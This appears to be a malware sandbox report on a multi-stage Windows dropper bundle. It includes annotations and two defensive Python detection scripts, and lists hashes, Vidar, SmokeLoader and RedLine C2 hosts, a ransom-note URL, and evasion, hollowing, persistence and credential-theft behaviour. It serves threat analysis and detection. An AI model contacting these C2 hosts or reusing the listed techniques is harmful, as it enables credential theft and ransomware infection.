Overview

Score | Sample     | Platform
-     | 8 (1).exe  | windows10_x64
10    | 8 (10).exe | windows10_x64
10    | 8 (11).exe | windows10_x64
10    | 8 (12).exe | windows10_x64
10    | 8 (13).exe | windows10_x64
10    | 8 (14).exe | windows10_x64
10    | 8 (15).exe | windows10_x64
10    | 8 (16).exe | windows10_x64
10    | 8 (17).exe | windows10_x64
10    | 8 (18).exe | windows10_x64
10    | 8 (19).exe | windows10_x64
10    | 8 (2).exe  | windows10_x64
10    | 8 (20).exe | windows10_x64
10    | 8 (21).exe | windows10_x64
-     | 8 (22).exe | windows10_x64
10    | 8 (23).exe | windows10_x64
10    | 8 (24).exe | windows10_x64
10    | 8 (25).exe | windows10_x64
-     | 8 (26).exe | windows10_x64
10    | 8 (27).exe | windows10_x64
10    | 8 (28).exe | windows10_x64
10    | 8 (29).exe | windows10_x64
10    | 8 (3).exe  | windows10_x64
10    | 8 (30).exe | windows10_x64
10    | 8 (31).exe | windows10_x64
10    | 8 (4).exe  | windows10_x64
10    | 8 (5).exe  | windows10_x64
10    | 8 (6).exe  | windows10_x64
10    | 8 (7).exe  | windows10_x64
10    | 8 (8).exe  | windows10_x64
10    | 8 (9).exe  | windows10_x64
10    | 8.exe      | windows10_x64
Resubmissions

Analysis ID       | Submitted        | Score
210813-wpta271jdx | 13-08-2021 10:16 | 10
210808-fgs5g9pxfs | 08-08-2021 23:00 | 10
210807-g2jw1lmd4a | 07-08-2021 23:12 | 10
210807-51nhct4kfx | 07-08-2021 16:10 | 10
210806-gc2271nxwj | 06-08-2021 23:43 | 10
210806-f443x39x8a | 06-08-2021 06:00 | 10
210805-97y6banvvx | 05-08-2021 17:08 | 10
210804-hkxx2ntr8x | 04-08-2021 17:25 | 10
210804-rjbg4b4y7n | 04-08-2021 12:12 | 10
210803-r2h7ytjwqj | 03-08-2021 17:12 | 10

Analysis

max time kernel: 1801s
max time network: 1810s
platform: windows10_x64
resource: win10v20210410
submitted: 20-07-2021 09:44
Static task: static1

Behavioral tasks

Task         | Sample     | Resource
behavioral1  | 8 (1).exe  | win10v20210410
behavioral2  | 8 (10).exe | win10v20210408
behavioral3  | 8 (11).exe | win10v20210410
behavioral4  | 8 (12).exe | win10v20210408
behavioral5  | 8 (13).exe | win10v20210410
behavioral6  | 8 (14).exe | win10v20210408
behavioral7  | 8 (15).exe | win10v20210410
behavioral8  | 8 (16).exe | win10v20210410
behavioral9  | 8 (17).exe | win10v20210408
behavioral10 | 8 (18).exe | win10v20210410
behavioral11 | 8 (19).exe | win10v20210408
behavioral12 | 8 (2).exe  | win10v20210410
behavioral13 | 8 (20).exe | win10v20210408
behavioral14 | 8 (21).exe | win10v20210410
behavioral15 | 8 (22).exe | win10v20210410
behavioral16 | 8 (23).exe | win10v20210408
behavioral17 | 8 (24).exe | win10v20210410
behavioral18 | 8 (25).exe | win10v20210408
behavioral19 | 8 (26).exe | win10v20210410
behavioral20 | 8 (27).exe | win10v20210408
behavioral21 | 8 (28).exe | win10v20210410
behavioral22 | 8 (29).exe | win10v20210410
behavioral23 | 8 (3).exe  | win10v20210408
behavioral24 | 8 (30).exe | win10v20210410
behavioral25 | 8 (31).exe | win10v20210408
behavioral26 | 8 (4).exe  | win10v20210410
behavioral27 | 8 (5).exe  | win10v20210408
behavioral28 | 8 (6).exe  | win10v20210410
behavioral29 | 8 (7).exe  | win10v20210408
behavioral30 | 8 (8).exe  | win10v20210410
behavioral31 | 8 (9).exe  | win10v20210410

The signatures below all reference behavioral24, the task that ran 8 (30).exe; its hashes are listed under General.
General

Target: 8 (30).exe
Size: 3.0MB
MD5: bb072cad921aa5ce8b97706ce01bc570
SHA1: 18bf034906c1341b7817e7361ad27a4425d820bd
SHA256: 817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97
SHA512: d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474
Malware Config

Extracted: ransom note
Path: C:\_readme.txt
URL: https://we.tl/t-N3p42CffoV

Extracted: vidar
Version: 39.6
Botnet: 933
C2: https://sslamlssa1.tumblr.com/
profile_id: 933

Extracted: smokeloader
Version: 2020
C2:
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/

Extracted: redline
Botnet: AniNEW
C2: akedauiver.xyz:80

Extracted: redline
Botnet: sel16
C2: dwarimlari.xyz:80

Extracted: redline
Botnet: sel17
C2: dwarimlari.xyz:80

Extracted: redline
Botnet: 1
C2: ynabrdosmc.xyz:80

Four distinct RedLine builds share two C2 hosts, and both the ransom-note URL (a we.tl share link) and the Vidar profile URL (a tumblr.com page) sit on legitimate services, which is what the "Legitimate hosting services abused for malware hosting/C2" signature below refers to. Block the hosts, not just the full URLs.
Signatures

Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.

description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1684 | 3444 | rUNdlL32.eXe | 96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6056 | 3444 | rUNdlL32.eXe | 96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4460 | 3444 | rUNdlL32.eXe | 96

All three children are the same mixed-case rUNdlL32.eXe launched from the WMI provider host (pid 3444). The casing is deliberate: Windows resolves the image name case-insensitively, but a detection rule that string-matches "rundll32.exe" exactly will miss it.
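A process-tree check that would catch the rows above has to compare image names after case-folding and should treat the odd casing itself as a signal. The following is an added example written for this report, not sandbox code: REPORT_EVENTS reproduces the three wmiprvse.exe -> rUNdlL32.eXe rows, while the two control events, the SENSITIVE_PARENTS baseline and the CANONICAL spelling table are assumptions for illustration.

```python
"""Parent/child process anomaly check with case-normalised image names.

Added example for this report, not sandbox code. The three REPORT_EVENTS
come from the rows above (wmiprvse.exe, pid 3444, spawning rUNdlL32.eXe);
the two control events, the SENSITIVE_PARENTS baseline and the CANONICAL
spelling table are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str           # child image name or path, exactly as logged
    ppid: int
    parent_image: str    # parent image name or path, exactly as logged


# Assumed baseline: service hosts that should not spawn execution utilities,
# mapped to the children that are still normal for them. Tune per estate.
SENSITIVE_PARENTS: Dict[str, set] = {
    "wmiprvse.exe": {"werfault.exe"},   # WMI provider host
    "spoolsv.exe": set(),
    "searchindexer.exe": set(),
}

# Canonical on-disk spelling of a few Windows binaries (assumed table).
# A name that matches case-insensitively but not exactly was typed by the
# launcher on purpose; rUNdlL32.eXe is the textbook case.
CANONICAL: Dict[str, str] = {
    "rundll32.exe": "rundll32.exe",
    "regsvr32.exe": "regsvr32.exe",
    "mshta.exe": "mshta.exe",
    "werfault.exe": "WerFault.exe",
    "conhost.exe": "conhost.exe",
    "svchost.exe": "svchost.exe",
}


def basename(image: str) -> str:
    """Strip any directory, keeping the original case."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1]


def norm(image: str) -> str:
    """Case-fold the basename so comparisons ignore the attacker's casing."""
    return basename(image).casefold()


def is_case_mangled(image: str) -> bool:
    """True when the name is a known binary spelled in non-canonical case."""
    name = basename(image)
    canonical = CANONICAL.get(name.casefold())
    return canonical is not None and name != canonical


def evaluate(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per event that violates the baseline or is case-mangled."""
    findings = []
    for ev in events:
        parent, child = norm(ev.parent_image), norm(ev.image)
        reasons = []
        allowed = SENSITIVE_PARENTS.get(parent)
        if allowed is not None and child not in allowed:
            reasons.append(f"{parent} is not expected to spawn {child}")
        if is_case_mangled(ev.image):
            reasons.append(f"image name {ev.image!r} is case-mangled")
        if reasons:
            findings.append({"pid": ev.pid, "ppid": ev.ppid, "child": child,
                             "parent": parent, "reasons": reasons})
    return findings


WMI_HOST = r"C:\Windows\system32\wbem\wmiprvse.exe"
REPORT_EVENTS = [
    ProcEvent(1684, "rUNdlL32.eXe", 3444, WMI_HOST),
    ProcEvent(6056, "rUNdlL32.eXe", 3444, WMI_HOST),
    ProcEvent(4460, "rUNdlL32.eXe", 3444, WMI_HOST),
    # Constructed controls: a crash handler under WMI and a user shell.
    ProcEvent(9001, "WerFault.exe", 3444, WMI_HOST),
    ProcEvent(9002, "cmd.exe", 1234, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in evaluate(REPORT_EVENTS):
        print(f["pid"], f["parent"], "->", f["child"], "; ".join(f["reasons"]))
```

The two checks are independent on purpose: the baseline catches a correctly spelled rundll32.exe under wmiprvse.exe, and the spelling check catches a mangled name under a parent that is not in the baseline at all.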
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (8 IoCs)

resource | yara_rule
behavioral24/memory/4972-280-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
behavioral24/memory/4972-281-0x0000000000417E1A-mapping.dmp | family_redline
behavioral24/memory/3880-328-0x0000000000417E26-mapping.dmp | family_redline
behavioral24/memory/3880-327-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
behavioral24/memory/500-347-0x0000000000417DEA-mapping.dmp | family_redline
behavioral24/memory/500-346-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
behavioral24/memory/4384-355-0x0000000000D40000-0x0000000000D5B000-memory.dmp | family_redline
behavioral24/memory/4384-357-0x0000000002850000-0x0000000002869000-memory.dmp | family_redline

The four pids map to OLKbrowser.exe (4972), jSdaT5nE0b8JDQ5TWF1Gy4dL.exe (3880), ACiNVstKWjR5KeuROoPr2s5O.exe (500) and Updater.exe (4384) in the "Executes dropped EXE" list; the first three are children whose parents set their thread context (see "Suspicious use of SetThreadContext"), i.e. the RedLine body was injected into a freshly spawned copy rather than being on disk.
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)

description | pid | Process | procid_target
PID 4260 created 4368 | 4260 | WerFault.exe | 103
PID 5708 created 7160 | 5708 | WerFault.exe | 212

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)

description | pid | Process | procid_target
PID 3896 created 7076 | 3896 | svchost.exe | 210
PID 3896 created 6712 | 3896 | svchost.exe | 301

WerFault pids 4260 and 5708 are the same instances that report crashes of 4368 and 7160 under "Program crash" below, so those two rows are crash-handler re-parenting rather than injection.

YARA rule Redline_stealer2 (8 IoCs)
The same eight memory dumps as the RedLine Payload rule:

resource | yara_rule
behavioral24/memory/4972-280-0x0000000000400000-0x000000000041E000-memory.dmp | Redline_stealer2
behavioral24/memory/4972-281-0x0000000000417E1A-mapping.dmp | Redline_stealer2
behavioral24/memory/3880-328-0x0000000000417E26-mapping.dmp | Redline_stealer2
behavioral24/memory/3880-327-0x0000000000400000-0x000000000041E000-memory.dmp | Redline_stealer2
behavioral24/memory/500-347-0x0000000000417DEA-mapping.dmp | Redline_stealer2
behavioral24/memory/500-346-0x0000000000400000-0x000000000041E000-memory.dmp | Redline_stealer2
behavioral24/memory/4384-355-0x0000000000D40000-0x0000000000D5B000-memory.dmp | Redline_stealer2
behavioral24/memory/4384-357-0x0000000002850000-0x0000000002869000-memory.dmp | Redline_stealer2
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer (2 IoCs)

resource | yara_rule
behavioral24/memory/1436-185-0x0000000000AE0000-0x0000000000B7D000-memory.dmp | family_vidar
behavioral24/memory/1436-186-0x0000000000400000-0x00000000008F2000-memory.dmp | family_vidar

Pid 1436 is sonia_3.exe in the "Executes dropped EXE" list, so the Vidar config above belongs to that component.

YARA rule aspack_v212_v242 (8 IoCs)

resource | yara_rule
behavioral24/files/0x000100000001ab9b-120.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab9b-121.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab96-125.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab97-124.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab99-129.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab99-131.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab97-127.dat | aspack_v212_v242
behavioral24/files/0x000100000001ab96-126.dat | aspack_v212_v242
Downloads MZ/PE file
Executes dropped EXE (64 IoCs)

pid | Process
2836 | setup_installer.exe
4032 | setup_install.exe
2084 | sonia_1.exe
1436 | sonia_3.exe
3952 | sonia_2.exe
1120 | sonia_6.exe
2840 | sonia_4.exe
3960 | sonia_5.exe
4016 | svchost.exe
3660 | explorer.exe
4120 | jhuuee.exe
4192 | OLKbrowser.exe
4284 | explorer.exe
4368 | setup.exe
4444 | jfiag3g_gg.exe
4584 | winnetdriv.exe
4604 | zhangd.exe
4756 | jfiag3g_gg.exe
4812 | Chrome Update.exe
5104 | zhangd.exe
4972 | OLKbrowser.exe
3568 | Conhost.exe
4936 | jSdaT5nE0b8JDQ5TWF1Gy4dL.exe
5060 | jfiag3g_gg.exe
416 | VkpE1gRngNXFU0Cn05vHerv0.exe
4164 | Acre.exe.com
4480 | Acre.exe.com
4616 | ACiNVstKWjR5KeuROoPr2s5O.exe
3860 | uPzycWHt5eiu5PHtDDY4fwTI.exe
4012 | wa5IqaoARMeCfzk5EGmIb5Jc.exe
3880 | jSdaT5nE0b8JDQ5TWF1Gy4dL.exe
4104 | rJhZg0bwisK5bP7bLxUHp2lu.exe
4384 | Updater.exe
3400 | ACiNVstKWjR5KeuROoPr2s5O.exe
500 | ACiNVstKWjR5KeuROoPr2s5O.exe
4676 | jfiag3g_gg.exe
5144 | 7jiLTiYSFXtwlgQxL3sEkMT6.exe
5372 | XC7GFZbOyXvcLg6m3jXQe4az.exe
5516 | setup_installer.exe
5556 | u23UoDWXrdQ41Fgmp4uqBhEf.exe
5648 | XC7GFZbOyXvcLg6m3jXQe4az.exe
5712 | setup_install.exe
5820 | NIAOGBzy_hFz9YCFo91sc8Cw.exe
5988 | karotima_1.exe
6024 | karotima_2.exe
5136 | 6UnP7EhagycDLPoMKxBtGRuQ.exe
5188 | karotima_2.exe
5148 | kGPLQ7M8fqAHElYq3fSV5UnL.exe
2216 | kGPLQ7M8fqAHElYq3fSV5UnL.exe
5960 | bKfpc48xGw3Dw3RG2dKu5Vwk.exe
4464 | 5465436.exe
6104 | szCedVVBNBra28ARc2qYEf08.exe
4476 | U_4UFn8WiO3eu26sOYob2_Fx.exe
6180 | 11111.exe
6188 | FSmhlU6Of5LeBRyI0j9T6fgM.exe
6196 | pADyznAja7hNAcn0P3Ium4B3.exe
6232 | bZzVstBGF42ordOVpwbQAw5J.exe
6276 | NIAOGBzy_hFz9YCFo91sc8Cw.exe
6284 | PHgFEn0n4RnF7W9nNSZBw4vt.exe
6304 | dKY998s5SPzWwNMcYpaw6yUY.exe
6320 | 8397034.exe
6336 | 3380837.exe
6348 | lhHmd78utKBh4mHCibwNzuCC.exe
6452 | I8cHejqtMA89JGV5R5M7N7Kp.exe

Several dropped files reuse system or vendor binary names (svchost.exe 4016, explorer.exe 3660 and 4284, Conhost.exe 3568, Chrome Update.exe 4812). Wherever those names appear in later signatures, check the pid against this list before assuming the real binary is involved.
Modifies extensions of user files (7 IoCs)
Ransomware generally changes the extension on encrypted files.

description | ioc | Process
File renamed | C:\Users\Admin\Pictures\ConvertFromGroup.raw => C:\Users\Admin\Pictures\ConvertFromGroup.raw.moqs | 9E06.exe
File renamed | C:\Users\Admin\Pictures\NewMount.raw => C:\Users\Admin\Pictures\NewMount.raw.moqs | 9E06.exe
File opened for modification | C:\Users\Admin\Pictures\OptimizeUse.tiff | 9E06.exe
File renamed | C:\Users\Admin\Pictures\OptimizeUse.tiff => C:\Users\Admin\Pictures\OptimizeUse.tiff.moqs | 9E06.exe
File renamed | C:\Users\Admin\Pictures\StepSet.raw => C:\Users\Admin\Pictures\StepSet.raw.moqs | 9E06.exe
File renamed | C:\Users\Admin\Pictures\UnpublishInstall.png => C:\Users\Admin\Pictures\UnpublishInstall.png.moqs | 9E06.exe
File renamed | C:\Users\Admin\Pictures\WaitProtect.crw => C:\Users\Admin\Pictures\WaitProtect.crw.moqs | 9E06.exe

9E06.exe is the component that also drops the C:\_readme.txt note (Malware Config) and installs the SysHelper Run key below; the encrypted-file extension is .moqs.

YARA rule upx (6 IoCs)

resource | yara_rule
behavioral24/files/0x000100000001aba5-222.dat | upx
behavioral24/files/0x000100000001aba5-248.dat | upx
behavioral24/files/0x000100000001aba5-267.dat | upx
behavioral24/files/0x000100000001aba5-221.dat | upx
behavioral24/files/0x000300000001abbb-303.dat | upx
behavioral24/files/0x000300000001abbb-302.dat | upx
Checks BIOS information in registry (2 TTPs, 10 IoCs)
BIOS information is often read in order to detect sandboxing environments.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rJhZg0bwisK5bP7bLxUHp2lu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rJhZg0bwisK5bP7bLxUHp2lu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | I8cHejqtMA89JGV5R5M7N7Kp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | U_4UFn8WiO3eu26sOYob2_Fx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | oStteIIySaOnBQ3EkjOI_WM9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | CF00.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | CF00.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | I8cHejqtMA89JGV5R5M7N7Kp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | U_4UFn8WiO3eu26sOYob2_Fx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | oStteIIySaOnBQ3EkjOI_WM9.exe

The same five processes (rJhZg0bwisK5bP7bLxUHp2lu.exe, I8cHejqtMA89JGV5R5M7N7Kp.exe, U_4UFn8WiO3eu26sOYob2_Fx.exe, oStteIIySaOnBQ3EkjOI_WM9.exe, CF00.exe) also hide their threads from debuggers and read EnableLUA below: one shared anti-analysis routine across those payloads.

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.

description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | build2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | sonia_5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | karotima_1.exe

Drops startup file (1 IoCs)

description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eRntMwARsh.url | Acre.exe.com

Loads dropped DLL (36 IoCs)

pid | Process | loads
4032 | setup_install.exe | 5
3952 | sonia_2.exe | 1
3860 | uPzycWHt5eiu5PHtDDY4fwTI.exe | 1
1436 | sonia_3.exe | 2
5712 | setup_install.exe | 5
6076 | 9E06.exe | 1
6572 | setup_install.exe | 5
2216 | kGPLQ7M8fqAHElYq3fSV5UnL.exe | 2
6528 | cmd.exe | 1
1036 | dKY998s5SPzWwNMcYpaw6yUY.exe | 2
7132 | KaN4oxVdNgcWXHg7_Sl3FY8D.exe | 2
6196 | pADyznAja7hNAcn0P3Ium4B3.exe | 2
6132 | D880.exe | 2
6308 | build2.exe | 2
208 | huratfj | 1
6120 | huratfj | 1
5228 | huratfj | 1

Modifies file permissions (1 TTPs, 1 IoCs)

pid | Process
5904 | icacls.exe
Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 2 IoCs)

description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" | sonia_6.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\22319f0f-b268-4e77-a6c3-67b2eaa72a32\\9E06.exe\" --AutoStart" | 9E06.exe

Both autoruns point into the user profile (a Temp path and a GUID-named folder under AppData\Local), which is where remediation should look; the values are printed with C-style escaping (doubled backslashes, \" for an embedded quote), so parse them before comparing paths.
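Turning the two Run values above into something a triage script can act on means undoing the report's escaping, splitting the command line the way CreateProcess does (a leading quote delimits the path) and then judging where the binary lives. The following is an added example written for this report, not sandbox code: RUN_VALUES carries the haleng and SysHelper values exactly as printed above plus one constructed benign control; the location heuristics and the rule that an unquoted path ends at the first ".exe" are assumptions.

```python
"""Triage a Run-key value as the sandbox report prints it.

Added example for this report, not sandbox code. RUN_VALUES holds the two
values from the rows above, exactly as the report escapes them, plus one
constructed benign control; the location heuristics are assumptions.
"""
import re
from typing import Dict, List

GUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)

RUN_VALUES: Dict[str, str] = {
    # HKLM\...\WOW6432Node\...\Run\haleng, set by sonia_6.exe
    "haleng": r'"C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"',
    # HKU\<sid>\...\Run\SysHelper, set by 9E06.exe
    "SysHelper": r'"\"C:\\Users\\Admin\\AppData\\Local\\22319f0f-b268-4e77-a6c3-67b2eaa72a32\\9E06.exe\" --AutoStart"',
    # Constructed control (assumption): a vendor updater under Program Files
    "VendorUpdate": r'"\"C:\\Program Files\\Vendor\\Updater.exe\" /background"',
}


def unescape_report_value(raw: str) -> str:
    """Undo the report's C-style quoting: outer quotes, \\\\ and \\" escapes."""
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        raw = raw[1:-1]
    out, i = [], 0
    while i < len(raw):
        if raw[i] == "\\" and i + 1 < len(raw) and raw[i + 1] in '\\"':
            out.append(raw[i + 1])
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return "".join(out)


def split_command(cmd: str):
    """Split a Run value into (executable, arguments) the way CreateProcess
    reads it: a leading quote delimits the path. For an unquoted path we
    assume it ends at the first '.exe' (real resolution tries prefixes)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end != -1:
            return cmd[1:end], cmd[end + 1:].strip()
    m = re.search(r"\.exe\b", cmd, re.I)
    if m:
        return cmd[:m.end()], cmd[m.end():].strip()
    head, _, tail = cmd.partition(" ")
    return head, tail.strip()


def assess(exe: str, args: str) -> List[str]:
    """Heuristic flags for where the autorun binary lives and how it is launched."""
    parts = exe.split("\\")
    low = [p.casefold() for p in parts]
    flags = []
    if len(low) > 2 and low[1] == "users" and "appdata" in low:
        flags.append("user-writable location")
    if "temp" in low:
        flags.append("temp directory")
    if any(GUID_RE.match(p) for p in parts[:-1]):
        flags.append("GUID-named directory")
    if "autostart" in args.casefold():
        flags.append("autostart switch")
    return flags


def analyze_run_value(raw: str) -> dict:
    """Decode one printed Run value and return path, arguments and flags."""
    exe, args = split_command(unescape_report_value(raw))
    return {"exe": exe, "args": args, "flags": assess(exe, args)}


if __name__ == "__main__":
    for name, raw in RUN_VALUES.items():
        r = analyze_run_value(raw)
        print(f"{name}: {r['exe']} {r['args']!r} -> {r['flags'] or 'no flags'}")
```

The same decode-then-split step applies to any registry string the sandbox prints, including the ransom-note path and the Program Files drops further down, so keep it separate from the scoring heuristics.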
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Queries the EnableLUA (UAC) policy value (7 IoCs)

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | rJhZg0bwisK5bP7bLxUHp2lu.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | U_4UFn8WiO3eu26sOYob2_Fx.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | I8cHejqtMA89JGV5R5M7N7Kp.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | oStteIIySaOnBQ3EkjOI_WM9.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | szCedVVBNBra28ARc2qYEf08.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | sH3EbgK9T6oeicNB0HXuc4vb.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CF00.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (15 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.

ioc | flows
api.2ip.ua | 342, 343, 378, 437, 458, 491, 562, 621, 700
ipinfo.io | 13, 14, 127, 129
ip-api.com | 9
api.ipify.org | 249

Drops file in System32 directory (3 IoCs)

description | ioc | Process
File opened for modification | C:\Windows\System32\Tasks\Time Trigger Task | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 36CE3052C12FA5DC | svchost.exe

These three paths are scheduled-task definitions and a WinINet cache file of the kind the service-hosting svchost.exe writes routinely; the report does not give a pid for these rows, and a dropped svchost.exe (pid 4016) also ran in this task, so attribute them only after checking the pid.
Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)

pid | Process
4104 | rJhZg0bwisK5bP7bLxUHp2lu.exe
4476 | U_4UFn8WiO3eu26sOYob2_Fx.exe
6452 | I8cHejqtMA89JGV5R5M7N7Kp.exe
7024 | oStteIIySaOnBQ3EkjOI_WM9.exe
6496 | CF00.exe

Suspicious use of SetThreadContext (29 IoCs)

description | pid | Process | procid_target
PID 4092 set thread context of 4016 | 4092 | svchost.exe | 99
PID 4192 set thread context of 4972 | 4192 | OLKbrowser.exe | 109
PID 4936 set thread context of 3880 | 4936 | jSdaT5nE0b8JDQ5TWF1Gy4dL.exe | 125
PID 4616 set thread context of 500 | 4616 | ACiNVstKWjR5KeuROoPr2s5O.exe | 148
PID 3568 set thread context of 2216 | 3568 | Conhost.exe | 181
PID 5960 set thread context of 6216 | 5960 | bKfpc48xGw3Dw3RG2dKu5Vwk.exe | 188
PID 6232 set thread context of 7148 | 6232 | bZzVstBGF42ordOVpwbQAw5J.exe | 214
PID 6276 set thread context of 6684 | 6276 | NIAOGBzy_hFz9YCFo91sc8Cw.exe | 221
PID 6856 set thread context of 5864 | 6856 | 5Dy7hOwiTL8Ak6QWynvwphUL.exe | 226
PID 5820 set thread context of 6276 | 5820 | NIAOGBzy_hFz9YCFo91sc8Cw.exe | 230
PID 6180 set thread context of 6312 | 6180 | 11111.exe | 231
PID 6520 set thread context of 5624 | 6520 | 2YmVmtTLWyb91Qe2CZ7Y8yVY.exe | 228
PID 6964 set thread context of 6652 | 6964 | WerFault.exe | 234
PID 6304 set thread context of 1036 | 6304 | dKY998s5SPzWwNMcYpaw6yUY.exe | 242
PID 6524 set thread context of 5064 | 6524 | w4tIrKVX0vuANbyiyKLpSWZC.exe | 246
PID 5224 set thread context of 2404 | 5224 | jxRhkXsx2LCqJ11KLYQ57gus.exe | 249
PID 7576 set thread context of 6156 | 7576 | 9E06.exe | 296
PID 7484 set thread context of 5752 | 7484 | 1234.exe | 299
PID 7616 set thread context of 6712 | 7616 | 1234.exe | 301
PID 6092 set thread context of 6076 | 6092 | 9E06.exe | 304
PID 4284 set thread context of 6308 | 4284 | build2.exe | 306
PID 4480 set thread context of 6728 | 4480 | Acre.exe.com | 319
PID 3496 set thread context of 6676 | 3496 | Acre.exe.com | 320
PID 7324 set thread context of 496 | 7324 | 9E06.exe | 322
PID 5300 set thread context of 6952 | 5300 | 9E06.exe | 326
PID 6180 set thread context of 4944 | 6180 | 9E06.exe | 328
PID 5116 set thread context of 7572 | 5116 | 9E06.exe | 335
PID 5568 set thread context of 5692 | 5568 | 9E06.exe | 337
PID 7576 set thread context of 5164 | 7576 | 9E06.exe | 346

The Conhost.exe (3568) and svchost.exe targets (4016) here are the dropped executables of those names from the "Executes dropped EXE" list, not the system binaries. Pairs where a process sets the context of a freshly spawned copy of itself (OLKbrowser.exe, jSdaT5nE0b8JDQ5TWF1Gy4dL.exe, ACiNVstKWjR5KeuROoPr2s5O.exe, the repeated 9E06.exe rows) are the usual hollowing pattern, and the RedLine memory dumps above were taken from exactly those children.
Drops file in Program Files directory (12 IoCs)

description | ioc | Process
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg | wa5IqaoARMeCfzk5EGmIb5Jc.exe
